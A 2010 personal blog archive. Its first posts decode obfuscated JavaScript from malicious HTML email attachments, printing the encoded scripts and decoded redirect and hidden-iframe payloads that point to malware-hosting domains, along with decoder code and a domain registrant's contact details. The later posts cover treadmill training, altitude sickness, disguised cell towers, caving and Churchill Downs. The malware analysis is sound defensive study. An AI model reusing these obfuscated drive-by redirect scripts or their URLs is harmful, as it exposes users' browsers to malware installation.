Tuesday, September 21, 2010

Html virus inspired by a toy decoder ring

Here's a junior level virus attempt that's inspired by the cereal box decoder ring.
It's much easier to understand, and actually kinda fun to go through.

Subject: Please sign and send back to me asap


Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Forgot the Attachment - Here ya go!

Content-Type: text/html; name="85104attach.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="85104attach.html"

After decoding we have:

[less than symbol] script type='text/javascript'>

var s = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?";
m = "";
for (i = 0; i < s.length; i++) {

m starts out empty.
The loop iterates over the length of s, with i as the counter.

This is the important part:
m += String.fromCharCode(s.charCodeAt(i) - 1);

Pretty basic: shift each character code down by one, so n becomes m, f becomes e, and so on.
Looking at an ASCII table shows the order of the punctuation (! becomes space, # becomes ", etc).
The first character = becomes a less than symbol, but I removed it to keep things from executing.

meta http-equiv="refresh" content="0;url=http://partynear.ru" />

The rest is just small stuff to get the script to work. Actually I think the & is put in the wrong place.

m=[28th position] insert an &
m=[23rd position] insert an !

document.write(m) hands the decoded string to the browser as HTML, and the meta refresh with a 0 second delay is what makes it all happen: the page loads and immediately sends the browser off to the site.
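As an added example (not the post's code), here is the same shift written as a function, plus a small loop that tries offsets in both directions and stops at the first output that looks like markup or a URL, so it also recovers samples that use a shift other than one. The string is the s from the script above; the function names are mine. Note that the bare shift by one gives content="0http://partynear.ru" with no ;url= in it, and the script's later string manipulations (the positional inserts mentioned above) are not part of this example.

```javascript
// Added example, not code from the post: the "decoder ring" shift as a
// function, plus a brute-force search over small offsets for samples
// where the shift is not 1. OBFUSCATED is the string s from the script
// above; the function names are my own.

const OBFUSCATED = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?";

// Shift every character code by delta. The script uses delta = -1;
// the same function with delta = +1 is the matching encoder.
function shiftString(s, delta) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode(s.charCodeAt(i) + delta);
  }
  return out;
}

// Try offsets -1, +1, -2, +2, ... and stop at the first output that looks
// like a tag or a URL. Goes beyond the one-off decode: it recovers samples
// that use any small shift, not just the one in this sample.
function findShift(s, maxAbs = 10) {
  const looksDecoded = (t) => /<\w+|https?:\/\//.test(t);
  for (let k = 1; k <= maxAbs; k++) {
    for (const delta of [-k, k]) {
      const candidate = shiftString(s, delta);
      if (looksDecoded(candidate)) return { delta, decoded: candidate };
    }
  }
  return null;
}

console.log(findShift(OBFUSCATED));
```

Run it with node; findShift reports delta -1 and the decoded meta tag. The "looks decoded" test is deliberately loose (a tag or a scheme), which is enough for this family of samples; a stricter check would be to require the result to parse as HTML.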

So what is at partynear.ru?
Not much, according to the text-only browser Lynx: it says "Unexpected network read error".
jsunpack shows that there appears to be a redirect sending you further into the site, into a Themes/card.js area that is trying to run another JavaScript. It's not clear if this is smoke or malware or something else.

Monday, September 20, 2010

Decoding html viruses followup

The last post was getting too long so it was time to start a new one.

Now the subject line says "contract for sports complex", and going through some of the previous decoding steps and feeding it into jsunpack leads us to a complicated scenario that the CyberCrime & Doing Time blog goes into here.

The browser visits a hostile site

jsunpack tells me that x.html contains:
info: [meta refresh] URL=xxxvideo-eyyc.cz.cc/video7/?afid=24
info: [iframe] findepotdirect.com/news/

which just looks like your basic "Can we sell you some cheap pills?" SpamRx, or in this case a porn site. BUT! you get this free surprise inside an iframe (an HTML element that loads another page inside this one).

The sports complex one I went through decoded to this (I've removed the opening angle brackets to keep the browser from trying to interpret it and changed http to h.ttp):

PLEASE WAITING.... 4 SECONDS meta h.ttp-equiv="refresh" content="4;url=h.ttp://xxxvideo-eyyc.cz.cc/video7/?afid=24" /> iframe width="0" height="0" src="h.ttp://findepotdirect.com/news/"> /iframe>

So while you are looking at xxxvideo-eyyc.cz.cc for those 4 seconds, your browser has also loaded findepotdirect.com/news/ in a 0 by 0 pixel iframe that you never see.
jsunpack tells me it contains a file called 3.wav, which I find pretty strange, but on further examination it's part of the xxxvideo porn site so it's more smoke.
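As an added example (not code from the post or from jsunpack), here is a small extractor that pulls the meta refresh target and any iframes out of a decoded page and flags the zero-sized or invisible ones, which is the quick triage step once the HTML is in the clear. The sample is the decoded "sports complex" payload above with the URLs defanged (h.ttp) the way the post does, plus the partynear.ru meta tag from the later post; the function names are mine.

```javascript
// Added example, not code from the post: find where a decoded page will
// send the browser. SAMPLE is the decoded payload quoted above, with the
// hosts defanged (h.ttp) as in the post; function names are my own.

const SAMPLE = 'PLEASE WAITING.... 4 SECONDS' +
  '<meta http-equiv="refresh" content="4;url=h.ttp://xxxvideo-eyyc.cz.cc/video7/?afid=24" />' +
  '<iframe width="0" height="0" src="h.ttp://findepotdirect.com/news/"></iframe>';

// Parse the attributes of one tag into a lower-cased name -> value map.
function attrs(tag) {
  const out = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    out[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
  }
  return out;
}

// Collect meta refreshes (delay + target) and iframes. An iframe counts as
// hidden when either dimension is 0 or its style makes it invisible.
function extractTargets(html) {
  const result = { refresh: [], iframes: [] };
  const tagRe = /<(meta|iframe)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const name = m[1].toLowerCase();
    const a = attrs(m[2]);
    if (name === 'meta' && (a['http-equiv'] || '').toLowerCase() === 'refresh') {
      // content is "<seconds>;url=<target>"; some samples drop the ";url=".
      const c = /^\s*(\d+)\s*;?\s*(?:url\s*=\s*)?(.*?)\s*$/i.exec(a.content || '');
      if (c) result.refresh.push({ delay: parseInt(c[1], 10), target: c[2] || null });
    } else if (name === 'iframe') {
      const w = parseInt(a.width, 10), h = parseInt(a.height, 10);
      const style = (a.style || '').toLowerCase();
      const hidden = w === 0 || h === 0 ||
        /display\s*:\s*none|visibility\s*:\s*hidden/.test(style);
      result.iframes.push({ src: a.src || null, hidden });
    }
  }
  return result;
}

console.log(JSON.stringify(extractTargets(SAMPLE), null, 2));
```

For the sample this reports one refresh (4 seconds, the xxxvideo host) and one hidden iframe (findepotdirect.com/news/). The visible redirect is the decoy to look at last; the hidden iframe is the URL to feed to jsunpack or Lynx first.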

What I need is more info about: findepotdirect.com/news

A quick google of findepotdirect.com/news shows one link and it was created by yours truly when I did the above jsunpack run.

So I finally finished my local install of the text-only browser "Lynx" on a Linux system, only to find out the site is, thankfully, down.

However the domain name is owned by someone:
Whois Server: whois.moniker.com
Referral URL: http://www.moniker.com/whois.html
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 13-sep-2010
Creation Date: 13-sep-2010

Expiration Date: 13-sep-2011

And the contact info, as held by the registrar Moniker:

Registrar: MONIKER

Registrant [3157846]:
Dennis Nanni root@munnuhome.com
6310 Rock Creek Rd
Tullahoma TN 37388 US

This domain was registered only a week ago, but it still isn't really functional, or it was and is no longer.

So I still don't know what they're up to, but it's getting harder and harder to find out just what it is, though I have a feeling that if the findepotdirect.com site answered then jsunpack would have more to say about it.

Decoding "html" viruses

My company has been getting a rash of viruses that come in as .html attachments.
The latest set has subject lines of "Delivery Status Notification (Failure)"

The interesting and useful thing about these viruses is that they are in obfuscated text form, and with some effort you can decode them.

If you look at the raw message text, the attachment comes in "Base64" encoding and looks like:

Content-Type: text/html; name="4727911.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="4727911.html"
This example is:


Which you can put through a decoder at:


Which gives you JavaScript all on one very long line.

Then you can take that and put it through a "beautifier" at

Which yields something that looks like a long unerased whiteboard.
Various things, like [lessthan], were added in the original paste to keep the system from thinking this is a script or HTML; the listing below uses the real characters, with the for loop and the final call (mangled in the paste) put back together so the script reads as it ran.

function etgr(zj4r) {
    var bo97, bvgy = "",
        kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s\"a<",
        p3je, j446 = iyv2.length;
    eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));
    for (p3je = 0; p3je < zj4r.length; p3je++) {
        bo97 = zj4r.charAt(p3je);
        kpn8 = iyv2.indexOf(bo97);
        if (kpn8 > -1) {
            kpn8 -= (p3je + 1) % j446;
            if (kpn8 < 0) kpn8 += j446;
            bo97 = iyv2.charAt(kpn8);
        }
        raiy(bo97);
    }
    // second eval(unescape("...%22%22;")): its encoded form did not survive the paste; per jsunpack it decodes to
    document.write(bvgy); bvgy = "";
}
etgr("0i\"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e\"moc>;a<msatmsol<.ituqchiix-e<u0:alpaxr");

So far the point of these viral scripts is to get the browser to go to a website that downloads and installs malware. The majority of this script is junk. What you're looking for is something that can build a URL, so it's the longer lines that you want to look at.

Let's examine the two eval lines:
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));
and the second eval(unescape(...)) at the end of the function (its encoded string got mangled in the paste, but jsunpack shows what it decodes to).

By putting the stuff in quotes into yet another online URL translator at

The first line says

function raiy(kuyc){bvgy+=kuyc}

Define a function called raiy that takes a value called kuyc and appends it to bvgy. Note the +=: bvgy accumulates one character per call.

and the second says

document.write(bvgy);bvgy="";

The second line writes whatever has accumulated in bvgy into the page and then clears it. That is not junk, it is the delivery step: everything the loop decodes gets handed to the browser as HTML.

The line
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s\"a<",

Looks way odd, but remember most of this is smoke, so keep the elements in mind.
This line declares kpn8 and sets iyv2 to a fixed alphabet of 30 symbols (the \" is just an escaped quote, a single character).
How are these used in the script?

kpn8 is an index into that alphabet, and it is set immediately:
kpn8 = iyv2.indexOf(bo97);

bo97 is not empty at that point: just before this the loop does bo97 = zj4r.charAt(p3je), so bo97 is the current character of the input string and indexOf returns its position in the alphabet, or -1 if it isn't in the alphabet, in which case the character passes through unchanged.

and iyv2

p3je, j446 = iyv2.length;

The length of that string is 30, so the shift wraps around modulo 30.
The last line inside the loop calls the previously defined function raiy and passes it the (possibly substituted) character, which raiy appends to bvgy.

By the way, the meaning of the JavaScript indexOf and charAt methods is explained here:

Looking back over the script I think we currently have a whole lot of possibly nothing.

The very last line is the most suspect:

etgr("0i\"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e\"moc>;a<msatmsol<.ituqchiix-e<u0:alpaxr");

Out of desperation I googled
and learned that other people were chasing the same thing down and were using this very cool (do I still get to say that?) site that also has an online decoder to which you can feed URLs or scripts:


jsunpack can handle multiple levels of JavaScript, so it goes through the same steps I did and then does another one.

And we get:
//eval function raiy(kuyc){bvgy+=kuyc}
//eval document.write(bvgy);bvgy="";
//document.write (s) [less than]meta equiv="refresh" content="0;url=http://numerouno-india.com/x.html">
[less than] meta http-equiv="refresh" content="0;url=h[.]ttp://numerouno-india.com/x.html" />

(I inserted the [.] to break the link.)

Bing Bing Bing! We have a winner: a URL. The jsunpack site goes on to check that the link has since been removed and is no longer a threat. Same scenario. Someone broke into that site and uploaded the virus x.html and then sent out a bunch of .html emails that point to it; the victim's browser then downloads it and (if the user is an "Administrator") installs it.

This is why on Windows it's a Really Good Idea to not be a user who has Administrator access when you're doing non-administrative things like reading email.

Now I really want to know how the unpacker was able to decode that last line in the scripts.
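Here is how that last line can be decoded without a browser. This is an added example, not the post's code and not how jsunpack is implemented: it reimplements etgr() as a plain function (the alphabet iyv2 and the argument are the ones from the script above; the names are mine), adds the inverse to show it really is a rolling shift, and unwraps the eval(unescape("...")) layers statically with unescape(), which only undoes %XX escapes and runs nothing. It also covers the two eval lines discussed earlier in this post.

```javascript
// Added example, not code from the post or from jsunpack. ALPHABET is
// iyv2 and PAYLOAD is the argument of the final etgr() call from the
// script above; the function names are my own.

const ALPHABET = '0ocdfum;ip/qrlx=nt.-:v he>s"a<';   // iyv2: 30 symbols
const PAYLOAD = '0i"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e"moc>;a<msatmsol<.ituqchiix-e<u0:alpaxr';

// What etgr() does: each input character that is in the alphabet is
// replaced by the alphabet entry (position + 1) steps to its left, wrapping
// around, so it is a Vigenère-style rolling shift with the key 1,2,...,30.
// Characters outside the alphabet pass through (the "if (kpn8 > -1)").
function rollingShiftDecode(input, alphabet) {
  const n = alphabet.length;
  let out = '';
  for (let i = 0; i < input.length; i++) {
    const ch = input.charAt(i);
    let idx = alphabet.indexOf(ch);
    if (idx > -1) {
      idx -= (i + 1) % n;
      if (idx < 0) idx += n;
      out += alphabet.charAt(idx);
    } else {
      out += ch;
    }
  }
  return out;
}

// The inverse: encoding the decoded text must give the original argument
// back, which confirms the reading of the algorithm.
function rollingShiftEncode(plain, alphabet) {
  const n = alphabet.length;
  let out = '';
  for (let i = 0; i < plain.length; i++) {
    const ch = plain.charAt(i);
    const idx = alphabet.indexOf(ch);
    out += idx > -1 ? alphabet.charAt((idx + (i + 1) % n) % n) : ch;
  }
  return out;
}

// Statically replace every eval(unescape("...")) with its decoded source.
// unescape() only expands %XX sequences, so nothing is executed.
function unwrapEvalUnescape(src) {
  return src.replace(/eval\(unescape\((["'])((?:\\.|(?!\1).)*)\1\)\)/g,
    (_, q, body) => unescape(body));
}

console.log(unwrapEvalUnescape('eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));'));
console.log(rollingShiftDecode(PAYLOAD, ALPHABET));
```

What jsunpack adds is that it actually runs the script in an instrumented interpreter and logs whatever reaches eval and document.write, which is why its output above is prefixed //eval and //document.write; the functions here reach the same meta refresh by hand, and the round trip through rollingShiftEncode shows the reading of the loop is exact.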

PS An excellent write-up of an older (but easier to decipher) outbreak can be found at:

Thursday, September 16, 2010

Treadmill Running - a new record for slow

I managed to run 4 miles today on a treadmill. It took me 63 minutes, which is close to what some people can walk, but I was running/jogging.

Same approach. Every time my pulse got to 150 or 151 I dropped my speed by 0.1 or 0.2 mph. Started at 4.8, then 4.6, then dropped it to 4.0 where I stayed until 2+ miles, then I dropped it to sub 4.0 mph for the rest of the time.

While it was nice to know that I could go 4 miles which I've never done before, I think it might be a better use of my time to work on extending the amount of time that I can go at above 4.0 mph while keeping my pulse under 150 bpm. I can do this in 30 minutes instead of an hour (an hour on a treadmill is a long time even with music and watching cute kids learn soccer) unless I suddenly get a whole lot more fit and it takes longer for my pulse to go over 150. It's problems like these you wish for. The other cool thing was knowing that if I wanted to I could have gone longer.

I do need to replace my shoes as even though they've only been used on a treadmill they are less springy than they used to be.

Sunday, September 12, 2010

Treadmill Running Breakthrough

For a while now I've been struggling with the issue that after running a mile, my right foot starts to drag and this really limits how well I can improve endurance-wise. I'm in better shape than that and this is a major impediment.

The issue was twofold which has made solving it a bit harder.

Heat on my back was the major problem as when a spot on my spine got hot the nerve conduction was compromised. This week I solved this by running in a one piece bathing suit that doesn't have a back (I also wear shorts over it too.). Doing that seemed to make a difference, but I was still struggling some after about 1.3 miles.

That's when I went back and did some more research on endurance training. I discovered in an earlier post that I'd been happily running at 90% of my max, which is great mountaineering training where you have to be able to work at or near the point where you are working anaerobically, but if you want to increase your endurance you have to go slower.

In "The Outdoor Athlete" by Courtenay and Doug Schurman (which you can get at http://bodyresults.com), they have a section on Endurance Training.
They define 4 levels of intensity

  • Recovery below 65% Maximum Heart Rate (MHR)
  • Distance Aerobic (low intensity) Session 65-75% MHR
  • Tempo Aerobic (medium intensity) Session 75-85% MHR
  • Anaerobic (high intensity) Session > 85% MHR

I'd been working out at 160 bpm so I chose 150 bpm (even before looking up the above) as a limit. That works out to be around 85% of my max heart rate. This is pretty high, but it's difficult for me to keep my working heart rate under that when I'm really exercising and it seemed worth trying as a starting point.

A note on Max heart rate. If you really want to know your max heart rate get on a treadmill with a heart rate monitor and run till you drop and note your heart rate as you're dropping. I am not joking. All of the formulas are just estimates. 220-your age is off (by 5 for me). Even the more accurate 209-.7(your age) is off as I get older. (I should probably insert the usual "Please consult with your Doctor before trying to establish your max heart rate" caveat.)

So after a light meal (1/2 a sandwich) and equipped with lemonade (though I usually have Gatorade), in my bathing suit and shorts with my ipod and heart rate monitor off the gym I went.

The gym wasn't crowded and was decently cool. There was a Lacrosse game going on in the closest field to me that I could watch and ponder if Lacrosse really did have rules as they claim.

I entered in my info to the treadmill and chose a starting speed of 5.0 mph which is the speed I'd been working at. My idea was every time my heart rate got to 150-151 bpm, I would decrease my speed by 0.1-0.2 mph, even past the point of what I considered ridiculous.

Very quickly I decreased my speed to 4.8 mph
Then sometime after that to 4.6 mph

At that speed I passed 1.0 mile and then 1.25 miles. No leg drag. Somewhere in there I dropped it down to 4.4 and then not long after that was around 4.0 mph, but I was still running and no leg drag (and I'm starting to marvel at this). 2 miles passed and I was still ok. (Whoa). Then my pulse started to climb and I dropped it into the 3.8 range which is a really fast walk for some people, but I was definitely jogging and getting a good benefit from it and was in the middle of being amazed that I was still going. I stopped paying as much attention to the details as I was so far past my goals but when I hit 2.85 I realized that I might be able to make 5K (3.25). Dropping my speed to 3.6 mph and even occasionally as low as 3.5 mph worked. I discovered this a little while back on a different run. Going really slow can be beneficial and a great confidence booster.

My foot started to get sore so I finally stopped at 55 minutes and 3.63 miles which is the furthest I've ever run in one session and I didn't stop to walk at all. All this from keeping my pulse right at or just under 150 bpm. I was never out of breath and at 160 bpm (90% MHR) I definitely get that way. As I got further into the run I had to pay more attention on my foot placement but I was not battling chronic leg drag.

So the lessons were. Do what works for you. Though definitely use outside advice as a guide, but do what works for your body. I had to mentally get past running so slow, but that was an excellent workout for me. I can speed up later as my endurance improves.

It's also kinda cool that I got past the 5k limit as then if I wanted to I could enter a 5k run, though things change when you're the one controlling the speed (instead of the treadmill) and other people are whizzing by you and you can't help but want to speed up, but that's another challenge for another day. I'm going to celebrate this milestone. I think it's time to make chocolate chip cookies.

Friday, September 10, 2010

Endurance Training

So I've been working on increasing the level of intensity that I can work at. This means that I can function at 90% of my max heart rate.

However I'm finding that my endurance has not increased very much and it's possibly why at altitude that I quite literally run out of oxygen and my muscles stop functioning very well. I have always thought it was the altitude since it always happens at particular elevations and that might have something to do with it, but it could be that I can only maintain working at 90% for so long.

Aerobic training (the kind where you can continue on indefinitely) is more around 85% of your max heart rate so I think I need to spend some time forcing myself to stay at that rate which is surprisingly hard when you have the illusion that you can go faster/harder.

One reason it's taken me this long to figure this out is that I only recently addressed the issue of my getting too hot. When I overheat I tire very quickly and start to trip over my own feet. I finally figured out if I wear a one piece bathing suit with a mostly open back, then the air is able to move around my back and keeps me cooler (I wear shorts too to keep the ridiculous look under control.) During the very first workout I was able to go longer, but still ran into a wall at just past 2 miles, so now I can start to work on the endurance angle more.

This makes me think that when I climb Mt Hoffman I should wear a heart rate monitor (what a great tool), and try to stay at 85% and see if I have the same altitude issues.

Thursday, September 09, 2010

The Cell Phone Tower Fake Trees

I remember the first few times I saw a cell phone tower disguised as a tree. There was something very subtle about it. I think I had time to look at it while driving by (perhaps I was a passenger). It was this niggling, "hmmmmm" double take sort of thing. "There's something funny about that tree. Hey wait a sec that's not a real tree!" (Cue dramatic Sherlock Holmesian music) I remember I felt I had discovered something.

Then it was "What does it do?" Something made me glance at my phone and the bars were so maxed out I thought they'd fall off the display. "Er, gee you think it has to do with cell phones."

Multiple fake tree sightings have verified this and a quick Google confirmed it. And why didn't I do that when I first saw one? Maybe it's the quest and the weird intrigue about something hiding in plain sight.

Now I see them all the time. They totally jump out and I can cheerfully (what a geek) say look a fake tree, just like I was pointing out a Red Tail Hawk or something.


Of course disguising cell towers isn't just limited to trees.
This church has turned a macabre sculpture of a crucified Jesus into a cell phone tower.

A friend has also been photographing these anomalies:
Here's one on 101 N that has what appears to be two towers.

But her favorite is the magic pine tree that appears amongst all the palm trees in the middle of the desert off of I-210. I guess palm trees were on back order and that Home Depot had just run out. Brilliant.

Wednesday, September 08, 2010

Pushing a Bike Uphill is Great Exercise

I've discovered that if you're willing to push your mountain bike up hills that you can't ride up, you get great upper body (more like full body) exercise. Suddenly you have an excellent crosstraining solution. Certainly no shame in that. And the best part is you get to ride the bike down. Wheee! Especially on Mt. Diablo's fireroads, which appear to be covered with a fine ball bearing gravel that I've slipped on more than once (and have since bought cleats for), this is very much a feature.

If you are willing to mix the two (walking and riding) you will find yourself going places that you couldn't have before. Just remember to bring plenty of food and water as you can go further than you would have anticipated.

More Altitude Thoughts

So the dilemma is. How do you ascend gradually when no places to stop exist?

Do you sleep as high as you can?
Above 8000' when I've increased my sleeping altitude more than 1500' I've gotten ill.
What's weird is that I can drive up to 10k' and be able to sleep ok, but walking up to that
elevation from 8500' is much harder.
Do you sleep a bit lower where you will likely get more rest but have to climb further?
At that lower elevation how long do you spend there? 1 day, 2 days, more?
I tend to still hit a wall at some point.
Or do you just take a longer (2-6 hours) break while ascending?
Tempting to try this. I've done a shorter version of this a few times which helps a little.
Or do you just suffer?
Which I know isn't terribly effective for me.

I'm going to Yosemite soon and I have to figure out how I want to do this. I think I need to see how high I can climb if I spend the night at a fairly high altitude. Tuolumne Meadows Campground is at 8600', but Whitney Portal is at 8350' and I know that with a 35-40# backpack I can only get up to Lone Pine at 9885' before I start to struggle and limp into Outpost Camp at 10,360'. So likely the only thing I would learn is whether I would do better without a heavy pack.

This all makes me crazy. Whitney I can likely find ways to make it work but other climbs like Shasta and Rainier break all of those altitude rules that my body seems to really like. There just aren't places to camp above a certain point. Sigh.

The altitude increase basics are no more than 1000' elevation gain in a 24 hour period (above say 8000'). I can do 1500', but when I try to do 2000' is when I often get ill. Everybody else gets to break these rules why can't I?

Mt Shasta Personal High Point and Further Elevation Experiments

More elevation navel gazing.

So on my most recent trip to Mt. Shasta with effort I got up to 11,125'.
I spent the night at Horse Camp (7900') and then we had porters lug our heavier equipment up to 50-50 at 9600'. With a night's sleep at Horse Camp I had no problem getting up to 9600'. Though a night's sleep at 50-50 didn't seem to make too much difference as it was still a struggle for me though at least this time I got past Helen "Lake" (10,400') and on to 11,125'.

Twice before I've climbed to Helen from Horse Camp. Sometimes it's easy, sometimes it's not. I can't quite figure it out. I do wonder if I had spent another night at 50-50 if that would have made much difference, but some while back on a group trip on the Hidden Valley route we spent two nights there and my climbing was still severely compromised despite being in excellent shape.

This is all starting to look like I might want to focus more on climbing on packed dirt (i.e. not scree and loose rock) since that's easier than snow, though when the snow is firm there's little difference between it and dirt. But snow softens throughout the day, and when the surface steepens and the day progresses you will find yourself kicking steps into the snow, which takes effort. Even when you're using crampons you have to focus more on foot placement and that takes more effort than just hiking on a trail.

On dirt I've been past 13,000' and one time when we were up camping comfortably at 12,000' in the Mitre basin I know I could have summited Mt Whitney (whose newly remeasured altitude is 14,505') had I been anywhere near a good trail instead of trying not to slide down Crab Tree pass (12,600'). I've also been at Lower Boy Scout Lake and was able to climb past 13,000'. I've also been ill at LBSL and didn't recover even after a couple of days. Maddening.

In the Mitre Basin we slept at
Horseshoe Meadow Trailhead 10,200'
Some unidentified spot at 11,000' (what a slog that was because of the sand on the Pacific Crest Trail)
Then we went up through the Mitre Basin and slept at an unnamed lake just past Sky Blue Lake which was at 12,000.
Then I climbed up to nearly 13,000'.
At no time was I ill - I had a mild headache from driving up to Horseshoe Meadows, but it got better.

So with a gradual ascent I am fine. Trouble is most climbs aren't nearly so accommodating in that respect. Counter intuitively, starting high makes things easier because you're not expending nearly so much oxygen and energy, but that has its limits. It's tempting to test this out in Estes Park CO and at Hawaii's Big Island.

I had this idea that I'd drive up to Yosemite and climb Mt. Hoffman (10,850') twice to see if there was any difference between the first day and spending the night at 8200' and then doing it again. The other approach would be to drive up and do almost nothing and then try the climb the next day. (Maybe even try something higher like Mt Dana.)

The other funny thing is that I seem to have an internal altimeter. I hit a wall at 7200' and at 9600', but can adapt with time (usually an overnight), but if I'm tired I don't always adjust to 9600'. I'm also going to maybe not use Diamox, but instead use Aspirin to see if that makes a difference, because it thins your blood.

So I don't know how I'll get up Shasta. I know I can get up Whitney (need to get a permit for next year come Feb), but Shasta doesn't offer higher places to camp (besides the crowded and not pleasant Lake Helen). I need to find a way I can camp high without getting ill (by increasing my sleeping elevation no more than 1500') and then climb higher.

Tuesday, September 07, 2010

Deep Cave Exploration - Yikes!

In my continuing quest to be very well read and well watched in things I would never do on my own, I'm listening to a book on Deep Caving called Blind Descent (http://www.audible.com/pd?asin=B003L8GZLQ).

Now I like tourist caves where you go and see all the cool formations that form from something being dripped on or from for many millennia. They are beautiful.

I also like hiking and climbing up mountains partially for the physical challenge, but mostly for the view really, and to spend time in a lovely environment, breathe some fresh air and just get outside the box.

Deep caving offers precisely none of these features save for the extreme physical challenge.

To risk sounding like Andy Rooney. I don't get it.

To be fair I'm only half way through, though I have little doubt my view will change much. [I'm much further now and I was right.]

Features of deep caves
  • pitch blackness, no light at all, you are totally dependent on artificial illumination
  • they are flooded much of the year and such are very wet
  • they are surprisingly noisy because of wind
  • your sleeping accommodations might be a narrow wet ledge that you have to worry about rolling off of
  • you go down first so when you "top out" you now have the hardest part of the climb still to go
  • there are myriad ways to die and nearly no help is available, or what there is is days away.
  • similar to mountaineering, even the simplest of injuries are much more difficult to manage; worse than mountaineering, the possibility of infection is much higher because of all the wet, dust, and silt. And the no help factor too.
Remarkably the main guy who leads a lot of the effort to discover the deepest cave seems pretty sane. His name is Bill Stone (ha) and you can see him speaking here at a Google "TED" conference:

National Geographic took an interest and has some information here:
and here

You can also learn to be a cave diver. That is another thing where the touristy "oh look at all the cool sea life" part totally appeals to me, but when you get down that deep it looks more like this photo from the US Deep Caving Team's webpage:
completely empty of life (well mostly).

As one reviewer of the book said. "It's all kinda creepy in a way." You are deliberately placing yourself in a really strange environment simply because no one else has yet been there. It is the last frontier on this Earth. Quite literally a journey towards the center of the Earth, and how people deal with being obsessed with finding the deepest cave in existence.

Of course the first or second thing that occurs to me is that this is a moving target in a way. Water, volcanoes and earthquakes are constantly reshaping the Earth. What is the lowest point now is very likely not going to continue that way for too long, but we are talking geologic time so it may not matter.

Saturday, September 04, 2010

The Churchill Downs Reality Check

There is going to be a National Dog Agility event in Louisville and some folks who are going are really interested in seeing Churchill Downs. I had to warn them about how disappointed I was when I finally got to see it many years ago. Churchill Downs is in the middle of Louisville, just like Santa Anita is right in the middle of Los Angeles. When I was there I had just seen Lexington and was so impressed by its beauty. I had these wondrous romantic visions of Churchill Downs when we arrived in Louisville. Wow, what a let down.

This is what I was picturing (this is a track somewhere in Lexington.)

This shows what the area really looks like - I was so bummed:
Here is a link where you can view it yourself